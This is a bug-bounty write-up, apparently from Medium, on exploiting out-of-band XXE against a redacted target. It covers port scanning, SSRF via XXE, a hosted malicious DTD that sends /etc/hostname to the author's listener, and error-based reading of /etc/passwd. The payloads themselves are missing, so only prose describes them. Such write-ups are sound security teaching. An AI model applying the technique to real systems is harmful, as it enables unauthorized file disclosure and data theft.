Exploiting Out-of-Band XXE in the Wild

Phase 1 → Recon:

I like shodan and enumerate IPs from it, so I collected a list of IPs that related to my target which we’ll call it redacted.com and after that, I made a full port scan with rustscan (you can use naabu or whatever you want) then I made an HTTP probe to them and started to check the unusual ports such as 8443, 8080, 8888, 9180, 9000, etc. and sure I passed all the requests to burp then I came across an IP with port 9180 open, this IP uses some xmlcontent so I tried to make a POST request with Content-Type: application/xml then I got some errors! In this stage, I decided to test XXE, which you can read about and practice here, so Let’s try to exploit it!

Phase 2 → Analysis:

I tried the payload that was used to detect the vulnerability, but the response contains only errors, so I tried to retrieve local files directly, so I used the classic payload:

Phase 3 → SSRF:

So, I thought that I can’t get P1 from this, then I tried to perform an HTTP request to my burp collab (SSRF), so I fire the burp again and tried the payload to perform SSRF from the XXE, so I tried this payload:

Filter responses that contain Connection refused

Phase 4 → OOB XXE:

And for now, I thought it’s time to test Out-of-band XXE because I could make SSRF, so if I hosted a malicious DTD file and did SSRF, forcing the site to request my malicious DTD file, may I could achieve the XXE, btw I told myself that this is the final try to get this XXE. But before the exploitation, you need to understand what is OOB XXE and how it works.

https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
  1. The site requested our malicious DTD file
  2. Our malicious DTD requests /etc/hostname file and send it to my IP on 1337 port
  3. my listener should receive a request with the /etc/hostname file content

Phase 5 → XXE Final Exploitation:

In this stage, I started to do what I know in OOB XXE attacks to get large file contents such as base64, FTP or even using some tools that were used to get the data through FTP, but I failed in all these ways :( But it is still something to try which is getting large file contents via error messages, But how it will happen?

  1. Hosted a malicious DTD file does two things:
  • has a defined XML parameter entity containing the content of the /etc/passwd file.
  • has a defined XML parameter entity containing a dynamic declaration of another XML parameter entity, and this will be evaluated by loading a nonexistent file whose name contains the pre-defined entity that we defined above, which in his turn getting /etc/passwd content.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mahmoud Youssef

Mahmoud Youssef

Cyber Security Researcher | Bug Hunter